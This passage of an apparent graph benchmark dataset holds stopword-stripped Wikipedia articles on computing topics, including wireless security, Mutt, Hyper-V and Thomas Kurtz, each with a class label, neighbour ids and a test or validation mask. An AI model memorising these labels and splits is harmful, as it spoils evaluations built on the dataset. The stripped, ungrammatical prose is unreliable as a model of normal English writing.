aes-ccmp-equipment one make sure one needs wrap ccmp-equipment 2 hardware standards compatible wpa2 wifi alliance branded version final 802.11i standard primary enhancement wpa inclusion aes-ccmp algorithm mandatory feature wpa wpa2 support eap authentication methods using radius servers preshared key psk number wpa wpa2 networks increasing number wep networks decreasing security vulnerabilities wep wpa2 found least one security vulnerability nicknamed hole196 vulnerability uses wpa2 group temporal key gtk shared key among users bssid launch attacks users bssid named page 196 ieee 802.11i specification vulnerability discussed order exploit performed gtk must known attacker unlike 802.1x 802.11i already additional security-services tkip wpav1 wpav2 may work cooperation eap wids stands wlan authentication privacy infrastructure wireless security standard defined chinese government strong form security combined server software hardware software card token use internal identity code combined user entered pin create powerful algorithm frequently generate new encryption code server time synced card token secure way conduct wireless transmissions companies area make usb tokens software tokens smart cards even make hardware versions double employee picture badge currently safest security measures smart cards usb tokens however expensive next safest methods wpa2 wpa radius server one three provide good base foundation security third item list educate employees contractors security risks personal preventive measures also task keep company workers knowledge base up-to-date new dangers cautious employees educated much lower chance anyone accidentally cause breach security locking laptop bring wide open home access point extend mobile range employees need made aware company laptop security extends outside site walls well includes places coffee houses workers vulnerable last item list deals 24/7 active defense measures ensure company network secure compliant take form regularly looking access point server firewall logs try detect unusual activity instance large files went access point early hours morning serious investigation incident would called number software hardware devices used supplement usual logs usual safety measures practical cases apply specialized wall paint window film room building significantly attenuate wireless signals keeps signals propagating outside facility significantly improve wireless security difficult hackers receive signals beyond controlled area enterprise within parking lots dos attacks easy detect however lot difficult stop even detection three common ways stop dos attack black holing one possible way stopping dos attack situation drop ip packets attacker good long-term strategy attackers change source address quickly may negative effects done automatically attacker could knowingly spoof attack packets ip address corporate partner automated defenses could block legitimate traffic partner cause additional problems validating handshake involves creating false opens setting aside resources sender acknowledges firewalls address syn floods pre-validating tcp handshake done creating false opens whenever syn segment arrives firewall sends back syn/ack segment without passing syn segment target server firewall gets back ack would happen legitimate connection would firewall send original syn segment server originally intended firewall n't set aside resources connection syn segment arrives handling large number false syn segments small burden rate limiting used reduce certain type traffic amount reasonably dealt broadcasting internal network could still used limited rate example subtle dos attacks good attack aimed single server keeps transmission lines least partially open communication rate limiting frustrates attacker legitimate users helps fully solve problem dos traffic clogs access line going internet nothing border firewall help situation dos attacks problems community stopped help isp organizations whose computers taken bots used attack firms increasing number mobile devices 802.1x interfaces security mobile devices becomes concern open standards kismet targeted towards securing laptops access points solutions extend towards covering mobile devices also host based solutions mobile handsets pda 802.1x interface security within mobile devices fall three categories wireless ips solutions offer wireless security mobile devices mobile patient monitoring devices becoming integral part healthcare industry devices eventually become method choice accessing implementing health checks patients located remote areas types patient monitoring systems security reliability critical influence condition patients could leave medical professionals dark condition patient compromised order implement 802.11i one must first make sure router/access point well client devices indeed equipped support network encryption done server radius ads nds ldap needs integrated server computer local network access point router integrated authentication server remote server ap's/routers integrated authentication servers often expensive specifically option commercial usage like hot spots hosted 802.1x servers via internet require monthly fee running private server free yet disadvantage one must set server needs continuously set server server client software must installed server software required enterprise authentication server radius ads nds ldap required software picked various suppliers microsoft cisco funk software meetinghouse data open-source projects software includes client software comes built-in windows xp may integrated os using following software remote authentication dial user service radius aaa authentication authorization accounting protocol used remote network access radius originally proprietary later published isoc documents rfc 2138 rfc 2139 idea inside server act gatekeeper verifying identities username password already pre-determined user radius server also configured enforce user policies restrictions well record accounting information connection time purposes billing today almost full wireless network coverage many urban areas infrastructure wireless community network consider future internet already place one could roam around always connected internet nodes open public due security concerns nodes encrypted users n't know disable encryption many people consider proper etiquette leave access points open public allowing free access internet others think default encryption provides substantial protection small inconvenience dangers open access fear may substantial even home dsl router density access points even problem limited number channels available partly overlap channel handle multiple networks places many private wireless networks example apartment complexes limited number wi-fi radio channels might cause slowness problems according advocates open access points n't involve significant risks open wireless networks public hand countries including germany persons providing open access point may made partially liable illegal activity conducted via access point also many contracts isps specify connection may shared persons",
    "neighbors": [
      7426,
      4,
      7557,
      10756,
      5387,
      9356,
      6797,
      9744,
      9745,
      7828,
      794,
      3742,
      10656,
      420,
      165,
      4517,
      3752,
      9640,
      939,
      1067,
      3629,
      11435,
      2996,
      10806,
      823,
      5433,
      5437,
      2430,
      1608,
      841,
      8264,
      10058,
      10574,
      4691,
      10451,
      4053,
      8022,
      10329,
      8922,
      8283,
      10332,
      9440,
      4580,
      10341,
      7527,
      2154,
      107,
      7411,
      4085,
      6904,
      10106,
      6779,
      7804,
      2429,
      2558,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 9641,
    "label": 3,
    "text": "Compatibility_card:compatibility card compatibility card expansion card computers allows hardware emulation another device popular macintosh systems allowed emulate windows pcs via nubus pci apple computer made many cards including compatibility card apple iie later orange micro made end 1990s greater application availability made cards obsolete besides pc compatibility cards others existed 3do blaster pcs",
    "neighbors": [
      6797,
      4047,
      8625,
      6130,
      9686,
      4220
    ],
    "mask": "None"
  },
  {
    "node_id": 9642,
    "label": 5,
    "text": "Mutt_(email_client):mutt email client mutt text-based email client unix-like systems originally written michael elkins 1995 released gnu general public license version 2 later version mutt slogan mail clients suck one sucks less mutt supports mail storing formats notably mbox maildir protocols pop3 imap etc. also includes mime support notably full pgp/gpg s/mime integration mutt originally designed mail user agent mua relied locally accessible mailbox sendmail infrastructure according mutt homepage though written scratch mutt initial interface based largely elm mail client new mutt message scoring threading capabilities support fetching sending email via various protocols pop3 imap smtp added later however mutt still relies external tools composing filtering messages mutt hundreds configuration directives commands allows changing key bindings making keyboard macros complex actions well colors layout interface variants concept known hooks many settings changed based criteria current mailbox outgoing message recipients also many patches extensions available add functionality nntp support sidebar similar often found graphical mail clients mutt fully controlled keyboard support mail conversation threading meaning one easily move around long discussions mailing lists new messages composed external text editor default unlike pine embeds editor known pico mutt capable efficiently searching mail stores calling mail indexing tools notmuch many people recommend mutt used way alternatively users search mail stores mutt calling grep via bash script mutt often used security professionals security-conscious users smaller attack surface compared clients ship web browser rendering engine javascript interpreter relation transport layer security mutt configured trust certificates first use use older less secure versions transport layer security protocol",
    "neighbors": [
      1664,
      2050,
      9986,
      3462,
      3465,
      1297,
      3218,
      9747,
      5397,
      11418,
      8094,
      7983,
      1075,
      2101,
      9909,
      3015,
      10956,
      10450,
      6231,
      7255,
      9690,
      8283,
      9451,
      5612,
      10861,
      9459,
      3578,
      8443,
      7036,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9643,
    "label": 2,
    "text": "FLEX_(operating_system):flex operating system flex single-tasking operating system developed technical systems consultants tsc west lafayette indiana motorola 6800 1976 original version 8 floppy disks smaller version 5.25 floppies called mini-flex also later ported motorola 6809 version called flex9 versions text-based intended use display devices ranging printing terminals like teletype model 33 asr smart terminals graphic displays supported tsc software hardware manufacturers supported elementary graphics pointing devices disk-based operating system using 256-byte sectors soft-sectored floppies disk structure used linkage bytes sector indicate next sector file free list directory structure much simplified result tsc others provided several programming languages including basic two flavors standard extended tokenizing version extended basic called pre-compiled basic forth c fortran pascal tsc also wrote version flex smoke signal dos california hardware manufacturer smoke signal broadcasting version used forward back linkage bytes sector increased disk reliability expense compatibility speed later tsc introduced multitasking multi-user unix-like uniflex operating system required dma disk controllers 8 disk sold small numbers several tsc computer languages ported uniflex early 1980s flex offered compusense ltd operating system 6809-based dragon 64 home computer following list commands supported different versions flex operating system",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      8729,
      4637,
      9762,
      5158,
      7217,
      9784,
      10809,
      576,
      10333,
      97,
      5220,
      8298,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150,
      2179,
      10883,
      6797,
      9366,
      6296,
      7325,
      9887,
      3248,
      6837,
      8388,
      9932,
      5840,
      1750,
      7382,
      8410,
      5853,
      1253,
      5363,
      2811,
      10499,
      1804,
      273,
      11539,
      5397,
      10016,
      3366,
      2345,
      7983,
      823,
      4409,
      7483,
      3904,
      11075,
      4423,
      8524,
      5457,
      11601,
      10590,
      2399,
      8551,
      5492,
      3960,
      394,
      3978,
      7057,
      11667,
      8092,
      421,
      11184,
      6075,
      6078,
      9151,
      8136,
      470,
      6128,
      5619,
      10235,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9644,
    "label": 9,
    "text": "Thomas_E._Kurtz:thomas e. kurtz thomas eugene kurtz born february 22 1928 retired dartmouth professor mathematics computer scientist along colleague john g. kemeny set motion revolutionary concept making computers freely available college students library books implementing concept time-sharing dartmouth college mission allow non-expert users interact computer co-developed basic programming language beginners all-purpose symbolic instruction code dartmouth time sharing system 1963 1964 native oak park illinois united states kurtz graduated knox college 1950 awarded ph.d. degree princeton university 1956 advisor john tukey joined mathematics department dartmouth college year taught statistics numerical analysis 1983 kurtz kemeny co-founded company called true basic inc. market true basic updated version language kurtz also served council chairman trustee educom well trustee chairman nercomp pierce panel president scientific advisory committee kurtz also served steering committees conduit project ccuc conferences instructional computing 1974 american federation information processing societies gave award kurtz kemeny national computer conference work basic time-sharing 1991 computer society honored kurtz ieee computer pioneer award 1994 inducted fellow association computing machinery 1951 kurtz first experience computing came summer session institute numerical analysis university california los angeles interests included numerical analysis statistics computer science ever since graduated 1950 obtained bachelor degree majoring mathematics 1956 age 28 went acquire phd princeton university thesis problem multiple comparisons mathematical statistics kurtz composed first computer program 1951 working computers ucla institute numerical analysis performed feat finishing grad school one year tuition princeton university 1963 1964 kurtz kemeny developed first version dartmouth time-sharing system time-sharing system university use basic language 1966 1975 kurtz served director kiewit computation center dartmouth 1975 1978 director office academic computing 1980 1988 kurtz director computer information systems program dartmouth ground-breaking multidisciplinary graduate program develop leaders industry subsequently kurtz returned teaching full-time professor mathematics emphasis statistics computer science part dartmouth time-sharing system kemeny kurtz created basic programming language first basic program ran may 1 1964 4 a.m. neither kemeny kurtz thought start something grand merely hoped would help students learn something computers using pair made certain invention immediately dispersed public made real money dartmouth college copyrighted basic however made basic available free anyone wanting use name language originated kurtz ’ wish simple acronym meant something well kurtz states “ wanted word simple simple-minded basic one. ” basic along books published earned lot positive feedback example “ second edition basic programming gives thorough description basic useful beginner also experienced programmer. ” “ overall evaluation basic programming ideal individual wishes program minimum effort equal value group classroom instruction. ” theme basic average computer user stressed kurtz open letter reiterates upon past statements basic invented give students simple programming language easy learn current languages time dedicated professionals went say basic people want dedicate lives programming repetition idea kurtz accentuates even success language wrote would remain implemented masses specialists basic standards created 1980s ecma ansi versions released 1986 1987 respectively basic popularity skyrocketed 1975 pair youngsters harvard dormitory bill gates paul allen created version basic viable one earliest personal computers gates allen ’ version became prominent iterations basic road basic long one kemeny kurtz forged darsimco – dartmouth simplified code – dartmouth ’ inaugural attempt making computing language 1956 however darsimco soon became obsolete language fortran manifested 1962 kemeny dartmouth undergraduate sidney marshall created language dope dartmouth oversimplified programming experiment direct predecessor basic dope little used kurtz preferred trying implement successful languages fortran algol kurtz experience dartmouth algol 30 lgp-30 convinced devising subsets languages quite practical led adopt kemeny ’ notion creating new language entirely although basic widely regarded success many computing professionals thought poor choice larger complicated programs larger programs became confusing messy used “ go ” statement jump one line program another criticism original language unstructured made difficult split programs separate parts improve readability basic structured also hindered ability debug modify parts code limited use larger companies hence largely remained language used smaller programs 1983 response proliferation street basics group graduating dartmouth students persuaded kemeny kurtz offer dartmouth version language commercial product first offering company true basic inc. based dartmouth basic 7 featured modern programming constructs “ if..then..else do..loop exit ” company described product “ simple elegant powerful true basic. “ upon kemeny advice true basic limited single os computer system “ today versions true basic available dos mac os windows unix linux systems ” kurtz retired dartmouth college 1993 continued develop maintain true basic",
    "neighbors": [
      10400,
      11328,
      11075,
      5317,
      4492,
      823,
      5492,
      1783,
      8057,
      11229
    ],
    "mask": "Test"
  },
  {
    "node_id": 9645,
    "label": 0,
    "text": "Reverso_(language_tools):reverso language tools reverso website specializing online translation aids language services include online dictionaries translation context spell checking conjugation tools softissimo inc. active since 1998 aim providing online translation linguistic tools corporate mass markets 2013 released reverso context bilingual dictionary tool based big data machine learning algorithms 2016 reverso acquired fleex service learning english via subtitled movies based content netflix fleex expanded also include video content youtube ted talks custom video files 2018 released new mobile app combines translations learning activities reverso suite online linguistic services 40 million users comprises various types language web apps tools translation language learning tools support many languages including english french hebrew spanish italian russian since founding reverso provided machine translation tools automated translation texts various languages including neural machine translation reverso context online mobile application combining big data large multilingual corpora allow users search translations context texts sourced mainly films books governmental documents allowing users see idiomatic usages translations well synonyms voice output reverso context app also provides language-learning features flashcards based words example sentences reverso context mobile app 4.7 ranking google play app store reverso also released browser extensions chrome firefox incorporate features reverso context web browsing reverso website also provides collaborative bilingual dictionaries various pairs languages use crowd sourcing allow users submit new entries provide feedback also tools conjugation verbs various language spell checking tools written multilingual grammar guides language learners reverso online localize service translates documents websites preserving layout february 2018 revealed translations reverso translation web site returned antisemitic results much nicer returning dachau much nicer auschwitz results prompted international league racism anti-semitism threaten reverso legal actions reverso answered twitter controversial content would removed one month time",
    "neighbors": [
      7918,
      9552,
      735,
      7164,
      6655
    ],
    "mask": "Test"
  },
  {
    "node_id": 9646,
    "label": 2,
    "text": "Security-focused_operating_system:security-focused operating system list operating systems specifically focused security general-purpose operating systems may secure practice without specifically security-focused similar concepts include security-evaluated operating systems achieved certification auditing organization trusted operating systems provide sufficient support multilevel security evidence correctness meet particular set requirements operating systems engineered around object-capabilities security paradigm instead system deciding access request granted bundling authority designation makes impossible request anything legitimate starting windows server 2008 windows server added installation option called server core traditional graphical user interface installed administration windows server 2008 rely windows command prompt roles components installed individually option reduces windows server footprint result reduced demand system resources reduced number components could potentially exploited via potential security vulnerabilities later windows server 2016 microsoft introduced nano server installation option even reduced footprint headless support locally connected keyboard monitor nano server windows server 1709 constantly updated sibling windows server 2016 installed container",
    "neighbors": [
      2560,
      516,
      5636,
      10756,
      5644,
      5139,
      9237,
      10780,
      4637,
      3618,
      2084,
      6184,
      9257,
      3629,
      1584,
      9266,
      1083,
      7739,
      10813,
      9791,
      10817,
      8772,
      8787,
      2134,
      89,
      3162,
      2143,
      2658,
      6244,
      107,
      6763,
      2671,
      3700,
      5245,
      125,
      5246,
      11391,
      7812,
      8326,
      9356,
      10382,
      657,
      2195,
      10392,
      9882,
      6301,
      1694,
      5279,
      5280,
      8867,
      2213,
      9897,
      7855,
      2737,
      10933,
      3262,
      4803,
      7368,
      8904,
      5325,
      6352,
      2262,
      6360,
      3289,
      3802,
      10464,
      1761,
      6373,
      4841,
      7920,
      5877,
      10492,
      5373,
      7938,
      4360,
      9488,
      8978,
      3865,
      1820,
      4892,
      5404,
      10016,
      5410,
      8998,
      1833,
      815,
      3887,
      7983,
      5430,
      823,
      6968,
      5433,
      3395,
      3911,
      10063,
      4435,
      4437,
      11095,
      7515,
      4956,
      3422,
      863,
      2914,
      3941,
      10091,
      6508,
      7020,
      1394,
      1396,
      1406,
      3458,
      899,
      7555,
      11654,
      9607,
      4493,
      10127,
      3473,
      11155,
      1431,
      4505,
      8092,
      2975,
      9637,
      935,
      8106,
      939,
      1456,
      5040,
      1970,
      11184,
      11188,
      1465,
      10170,
      9660,
      10687,
      1474,
      3525,
      4040,
      457,
      5065,
      9160,
      10192,
      8147,
      8661,
      9688,
      9696,
      11232,
      1506,
      4067,
      8676,
      2021,
      9190,
      10732,
      11244,
      1524,
      2036,
      5110,
      5620,
      2041,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9647,
    "label": 8,
    "text": "IBM_HTTP_Server:ibm http server ibm http server ihs web server based apache software foundation http server runs aix hp-ux linux solaris jade windows nt ibm z/os available download use free charge without ibm support http server also included ibm websphere application server distribution packages default web console administration port 8008 ibm administration port 2001 license agreement ibm http server ibm international license agreement non-warranted programs ilan",
    "neighbors": [
      225,
      865,
      9580,
      11693,
      8976,
      6993,
      823,
      1304,
      2168,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 9648,
    "label": 7,
    "text": "Snappii:snappii snappii sometimes stylized snappii cloud-based codeless platform rapid mobile app development largely businesses enterprises 2015 company helped produce 26,000 mobile apps 29 different industries 17 languages snappii-produced apps include starbucks location finder public safety app college campuses mobile pdf form uploader snappii used ios android devices snappii founded 2010 alex bakman also serves ceo snappii platform launched 2011 primarily tool iphone app creation company ipad android app creation systems still beta november 2011 2012 snappii added compatibility support android devices also 2012 customers created 6,000th app using snappii platform 2015 snappii released series new features ranging audio video support enhanced charting capabilities also announced new offer called 5 weeks- 5k-guaranteed app guarantees customers custom native app within five weeks 5,000 august 2015 company raised 250,000 investor funding 2015 snappii platform produced around 26,000 applications 17 languages companies 29 different industries snappii offers cloud-based codeless platform developing business enterprise mobile applications ios android devices users including non-programmers create apps using wysiwyg formatting rather source code snappii also create custom native apps clients whether client opts create app enlists help snappii programmers must pay monthly hosting fee snappii helped develop apps companies 29 different industries including health care construction public safety retail oil gas others features snappii platform include audio video support charting capabilities ability upload pdf forms via pdf form manager app",
    "neighbors": [
      4194,
      6539,
      9732,
      8627
    ],
    "mask": "Test"
  },
  {
    "node_id": 9649,
    "label": 3,
    "text": "LGA_1366:lga 1366 lga 1366 also known socket b intel cpu socket socket supersedes intel lga 775 socket high-end performance desktop segments also replaces server-oriented lga 771 socket j entry level superseded lga 2011 lga stands land grid array socket 1,366 protruding pins touch contact points underside processor cpu accesses three channels ddr3 memory via processor internal memory controller socket 1366 socket b uses qpi connect cpu reduced-function northbridge serves mainly pci-express controller slower dmi used connect intel recent northbridge southbridge components comparison intel socket 1156 socket h moves qpi link pci-express controller onto processor using dmi interface single-component chipset called pch serves traditional southbridge functions difference pin number mostly reflection number memory channels served november 2008 intel released core i7 first processor requiring socket lga 1366 socket processors discontinued sometime 2012 superseded lga 2011 socket 14 november 2011 supporting sandy bridge e-series processors accompanying lga 1156 discontinued time replaced lga 1155 socket b processors following mechanical maximum load limits exceeded heatsink assembly shipping conditions standard use load limits crack processor die make unusable processors using socket lower static load limit previous models using lga 775 available reference heat sinks include circular design heatpipe design chipsets support lga 1366 intel x58 desktop 3400 3420 3450 5500 5520 7500 server",
    "neighbors": [
      3588,
      3973,
      5901,
      5523,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      4537,
      7105,
      6339,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      2525,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "None"
  },
  {
    "node_id": 9650,
    "label": 4,
    "text": "CloudPassage:cloudpassage cloudpassage company provides automation platform delivered via software service improves security private public hybrid cloud computing environments cloudpassage headquartered san francisco cloudpassage founded carson sweet talli somekh vitaliy geraymovych 2010 company used cloud computing big data analytics implement security monitoring control platform called halo cloudpassage spent year stealth developing halo technology coming stealth mode closed beta january 2011 june 2012 company launched commercial product included configuration security monitoring network microsegmentation two-factor authentication privileged access management 2013 cloudpassage expanded halo support large enterprises advanced security compliance requirements product called halo enterprise first round venture funding company raised 6.5 million april 2012 cloudpassage raised 14 million financing round led tenaya capital february 2014 cloudpassage announced raised 25.5 million funding led shasta ventures total company invested 30 million technology raised approximately 88 million capital cloudpassage platform provides cloud workload security compliance systems hosted public private cloud infrastructure environments including hybrid cloud multi-cloud workload hosting models flagship product company offers called halo halo secures virtual servers public private hybrid cloud infrastructures provides file integrity monitoring fim also administering firewall automation vulnerability monitoring network access control security event alerting assessment halo platform also provides security applications privileged access management software vulnerability scanning multifactor authentication log-based ids december 2013 cloudpassage set six servers microsoft windows linux operating systems combinations popular programs invited hackers attempt hack servers top prize 5,000 winning hacker novice completed task four hours cloudpassage programmed servers use basic default security settings show vulnerable cloud computing programs security threats may 2011 gigaom named cloudpassage list top 50 cloud innovators month eweek recognized cloudpassage one 16 hot startup companies flying radar sc magazine named cloudpassage industry innovator virtualization cloud security category 2012 also 2012 wall street journal named cloudpassage runner information security category technology innovation awards cloudpassage large-scale security program halo best security solution 2014 siia codie awards",
    "neighbors": [
      4194,
      6372,
      6797,
      467,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 9651,
    "label": 3,
    "text": "Monopoly_(1985_video_game):monopoly 1985 video game monopoly 1985 multi-platform video game based board game monopoly released amiga amstrad cpc bbc micro commodore 64 ms-dos msx tatung einstein thomson mo thomson zx spectrum published leisure genius title one many inspired property game contains similar gameplay board game based various physical tasks replaced automation digital representations computer shopper praised game graphics animation deemed excellent value spectrum thought game excellent conversion board game sinclair user wrote game boring one issue amiga power deemed sound conversion albeit expensive source material another publication said competent arguably quite pointless",
    "neighbors": [
      7536,
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 9652,
    "label": 3,
    "text": "Mundial_de_Fútbol:mundial de fútbol mundial de fútbol football sports game released amstrad cpc zx spectrum msx ms-dos platforms created 1990 opera soft due internal problems company released celebration 1990 fifa world cup simulation show upper view goals upper lower parts screen players reached tough scroll",
    "neighbors": [
      9166,
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9653,
    "label": 0,
    "text": "Quack.com:quack.com quack.com early voice portal company domain name later used quack ipad search application aol founded 1998 steven woods jeromy carriere alex quilici pittsburgh pennsylvania usa based voice portal infrastructure company named quackware quack first company try create voice portal consumer-based destination site consumers could access information voice alone also complete transactions quackware launched beta phone service 1999 allowed consumers purchase books sites amazon cds sites cdnow answering short set questions quack followed set information services movie listings inspired expanding upon moviefone news weather stock quotes concept introduced series lookalike startups including tellme networks raised money internet startup history similar concept quack received venture funding 1999 moved operations mountain view silicon valley california 1999 deal lycos announced may 2000 september 2000 quack acquired 200 million america online aol moved onto netscape campus left netscape team quack attacked canadian press representative canadian brain drain us internet bubble focusing recruiting efforts university waterloo hiring 50 engineers waterloo less 10 months quack competitor tellme networks raised enormous funds became highly competitive market 2000 emergence dozen additional competitors 12-month period following acquisition america online effort led ted leonsis bring quack aol interactive quack voice service became aolbyphone one aol web properties along mapquest moviefone others quack secured several patents underlie technical challenges delivering interactive voice services constructing voice portal required integrations innovations speech recognition speech generation also databases application specification constraint-based reasoning artificial intelligence computational linguistics quack name derived company goal providing voice-based services broadly quick ubiquitous access consumer knowledge patents assigned quack.com include system method voice access internet-based information system method advertising internet voice portal recognizing axiom interactive voice systems one must know set possible answers question asking system method determining one web site information another web site quack.com spoofed simpsons march 2002 episode blame lisa comquaak sign replaced another equally crazy telecom company name july 2010 quack.com became focus new aol ipad application web search experience product delivers web results blends picture video twitter results enables preview web results go site search within result flip results pages making full use ipad touch screen features ipad app free via itunes support discontinued 2012",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 9654,
    "label": 2,
    "text": "Meiryo:meiryo decided new japanese font needed current ones mainly ms gothic ms mincho incompatible microsoft cleartype subpixel rendering technology meiryo intended increase legibility characters lcd screens cleartype available windows latin fonts since release windows xp october 2001 however unlike latin fonts use cleartype hinting system sizes japanese fonts distributed windows included embedded bitmap versions fonts small sizes although fonts using hinted cjk glyphs exist arial unicode ms distributed windows prior vista meiryo ui version uses condensed kana reduced line height compared meiryo introduced windows 7 also available update windows vista windows server 2008 similar ms gothic meiryo ui fonts bundled meiryo ttc files respective weights meiryo ui update also available windows vista windows server 2008 meiryo designed enhanced version verdana regarded highly readable font font baseline raised slightly improve readability mixing latin cjk texts meiryo glyphs kanji kana also height-to-width ratio 95:100 previous japanese fonts distributed windows embedded bitmap glyphs used whenever font size set around 9 points unlike previous fonts designed cjk environments meiryo contains embedded bitmaps improve readability small font sizes without using embedded bitmaps truetype hinting language used stroke-reduction similar technology used mingliu pmingliu versions 5.03 meiryo developed comply jis x 0213:2004 also use newest set personal name characters provided japanese minister justice addition contains opentype tables jis78 jis83 jis90 forms legacy usages meiryo supports following opentype layout features cyrillic greek han ideographic kana latin scripts nalt afrc dnom dlig frac fwid hwid hkna ital jp78 jp83 jp90 numr qwid ruby sinf zero smcp c2sc liga sups twid vkna vrt2 vert kern meiryo also contains glyphs normally accessible without font editor glyphs include circled 00 51–100 negative circled 00 21–100 a–z a–z kana rounded square-enclosed characters negative rounded square-enclosed characters 2x2 cjk words italic version meiryo provides italicized glyphs latin alphabet written japanese traditionally italicized microsoft windows meiryo distributed two truetype collection files regular bold glyphs stored separate files file also contains italic variant font stated earlier font included windows vista operating system windows xp font become available free charge obtaining japanese version microsoft visual c 2008 express edition electing install microsoft silverlight runtime downloading installing japanese cleartype fonts windows xp microsoft also makes meiryo available windows xp meiryo also distributed japanese version microsoft office 2008 mac microsoft office 2010 microsoft office 2013 japanese characters meiryo designed c g inc. eiichi kōno also redesigned johnston font used london underground new johnston latin characters designed matthew carter british-born creator verdana font visibly similar characters verdana font designed combination japanese latin font experts microsoft strived create font written english japanese could present well together side-by-side screen american tom rickner ascender corporation extensive programming font hinting meiryo rickner helped create first truetype fonts apple font hinting microsoft ’ georgia verdana fonts according rickner meiryo one first japanese fonts created computer screen took two years create engineer font name comes japanese word meiryō means clarity referring cleartype making text written meiryo appear clearer screen japanese spelling taken english pronunciation actual japanese spelling katakana according eiichi kōno name chosen exotic-sounding pronunciation compactness although proportional font font name contain p indicate windows font lists tokyo type directors club awarded 2007 type design prize eiichi kōno c g inc satoru akamoto takeharu suzuki yukiko ueda matthew carter meiryo font",
    "neighbors": [
      2593,
      4130,
      9539,
      7973,
      8422,
      1098,
      4138,
      2221,
      4141,
      1487,
      6797,
      3538,
      4146,
      4148,
      8374,
      4127
    ],
    "mask": "None"
  },
  {
    "node_id": 9655,
    "label": 2,
    "text": "Hyper-V:hyper-v microsoft hyper-v codenamed viridian formerly known windows server virtualization native hypervisor create virtual machines x86-64 systems running windows starting windows 8 hyper-v superseded windows virtual pc hardware virtualization component client editions windows nt server computer running hyper-v configured expose individual virtual machines one networks hyper-v first released alongside windows server 2008 available without additional charge since windows server 2012 windows 8 standalone windows hyper-v server free command line interface beta version hyper-v shipped certain x86-64 editions windows server 2008 finalized version released june 26 2008 delivered windows update hyper-v since released every version windows server microsoft provides hyper-v two channels hyper-v server 2008 released october 1 2008 consists windows server 2008 server core hyper-v role windows server 2008 roles disabled limited windows services hyper-v server 2008 limited command-line interface used configure host os physical hardware software menu driven cli interface freely downloadable script files simplify configuration addition hyper-v server supports remote access via remote desktop connection however administration configuration host os guest virtual machines generally done network using either microsoft management consoles another windows computer system center virtual machine manager allows much easier point click configuration monitoring hyper-v server hyper-v server 2008 r2 edition windows server 2008 r2 made available september 2009 includes windows powershell v2 greater cli control remote access hyper-v server requires cli configuration network interfaces windows firewall also using windows vista pc administer hyper-v server 2008 r2 fully supported hyper-v implements isolation virtual machines terms partition partition logical unit isolation supported hypervisor guest operating system executes must least one parent partition hypervisor instance running supported version windows server 2008 later virtualization software runs parent partition direct access hardware devices parent partition creates child partitions host guest oss parent partition creates child partitions using hypercall api application programming interface exposed hyper-v. child partition access physical processor handle real interrupts instead virtual view processor runs guest virtual address depending configuration hypervisor might necessarily entire virtual address space depending vm configuration hyper-v may expose subset processors partition hypervisor handles interrupts processor redirects respective partition using logical synthetic interrupt controller synic hyper-v hardware accelerate address translation guest virtual address-spaces using second level address translation provided cpu referred ept intel rvi formerly npt amd child partitions direct access hardware resources instead virtual view resources terms virtual devices request virtual devices redirected via vmbus devices parent partition manage requests vmbus logical channel enables inter-partition communication response also redirected via vmbus devices parent partition also virtual devices redirected reaches parent partition gain access physical devices parent partitions run virtualization service provider vsp connects vmbus handles device access requests child partitions child partition virtual devices internally run virtualization service client vsc redirect request vsps parent partition via vmbus entire process transparent guest os virtual devices also take advantage windows server virtualization feature named enlightened i/o storage networking graphics subsystems among others enlightened i/o specialized virtualization-aware implementation high level communication protocols like scsi allows bypassing device emulation layer takes advantage vmbus directly makes communication efficient requires guest os support enlightened i/o currently following operating systems support enlightened i/o allowing therefore run faster guest operating systems hyper-v operating systems need use slower emulated hardware hyper-v role available x86-64 variants standard enterprise datacenter editions windows server 2008 later well pro enterprise education editions windows 8 later windows server installed regardless whether installation full core installation addition hyper-v made available part hyper-v server operating system freeware edition windows server either way host computer needs following amount memory assigned virtual machines depends operating system number cpus assigned virtual machine also depends os also maximum number concurrently active virtual machines following table lists supported guest operating systems windows 10 pro rs5 windows server 2019 fedora 8 9 unsupported however reported run third-party support freebsd 8.2 later guests provided partnership netapp citrix includes emulated paravirtualized modes operation well several hyperv integration services windows 10 home support hyper-v desktop virtualization vdi products third-party companies quest software vworkspace citrix xendesktop systancia applidis fusion ericom powerterm webconnect provide ability host centrally manage desktop virtual machines data center giving end users full pc desktop experience guest operating systems enlightened i/o hypervisor-aware kernel windows server 2008 later server versions windows vista sp1 later clients offerings citrix xenserver novell able use host resources better since vsc drivers guests communicate vsps directly vmbus non- enlightened operating systems run emulated i/o however integration components include vsc drivers available windows server 2003 sp2 windows vista sp1 linux achieve better performance july 20 2009 microsoft submitted hyper-v drivers inclusion linux kernel terms gpl microsoft required submit code discovered incorporated hyper-v network driver gpl-licensed components statically linked closed-source binaries kernels beginning 2.6.32 may include inbuilt hyper-v paravirtualization support improves performance virtual linux guest systems windows host environment hyper-v provides basic virtualization support linux guests box paravirtualization support requires installing linux integration components satori inputvsc drivers xen-enabled linux guest distributions may also paravirtualized hyper-v. microsoft officially supported suse linux enterprise server 10 sp1/sp2 x86 x64 manner though xen-enabled linux able run february 2008 red hat microsoft signed virtualization pact hypervisor interoperability respective server operating systems enable red hat enterprise linux 5 officially supported hyper-v. hyper-v windows server 2012 windows server 2012 r2 changes support list follows hyper-v like microsoft virtual server windows virtual pc saves guest os single virtual hard disk file supports older .vhd format well newer .vhdx older .vhd files virtual server 2005 virtual pc 2004 virtual pc 2007 copied used hyper-v old virtual machine integration software equivalents hyper-v integration services must removed virtual machine migrated guest os configured started using hyper-v guest os detect changes virtual hardware installing hyper-v integration services installs five services improve performance time adding new guest video network card drivers hyper-v virtualize audio hardware windows 8.1 windows server 2012 r2 possible work around issue connecting virtual machine remote desktop 